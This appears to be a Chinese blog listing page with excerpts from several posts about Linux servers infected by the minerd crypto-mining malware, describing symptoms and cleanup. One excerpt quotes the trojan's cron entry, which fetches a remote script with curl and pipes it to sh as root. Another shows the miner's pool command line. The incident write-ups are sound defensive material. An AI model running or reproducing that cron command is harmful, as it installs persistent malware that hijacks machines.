服务器出现异常,完全无法访问,ssh登陆都极其缓慢 解决过程 top 查看系统状态,发现 load average 平均负载值非常高,再看排名第一的进程,是一个不认识的进程名:minerd 感觉是被入侵了,上网搜了下minerd是什么东西,是个挖矿程序,看来的确被入侵了,被抓来当矿工了 查看进程信息 ...
分类:
系统相关 时间:
2016-08-10 20:42:07
阅读次数:
332
现象:就是cpu使用率超级大,能到300%木马脚本内容:exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo"*/10****curl-fsSLhttps://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/root
mkdir-p/var/spool/cron/crontabs
echo"*/10****curl-fsSLhttps://r.ch..
分类:
其他好文 时间:
2016-07-22 19:41:02
阅读次数:
858
收到一条短信服务器CPU跑到了90%,赶紧登陆服务器top查看一下,这个叫minerd的程序消耗这么多,这是个什么东西啊?#find/-nameminerd/opt/minerd#lsKHK75NEOiq33minerd在opt目录下,并删除这两个文件psaux|grepminerdSLslJul1534:25/opt/minerd-B-acryptonight-ostratum+tcp://x..
分类:
其他好文 时间:
2016-07-17 02:40:10
阅读次数:
8937
今天服务器cpu使用率一直很高,而且是nice高,说明是一些低优先级的进程占用了大量的cpu,经过排查发先了minerd这个进程以服务器的/tmp目录下找到了源头。。。。。一个简单的脚本: 1 Cpunum=`cat /proc/cpuinfo |grep 'processor'|wc -l`; 2...
分类:
其他好文 时间:
2014-07-21 09:00:58
阅读次数:
299
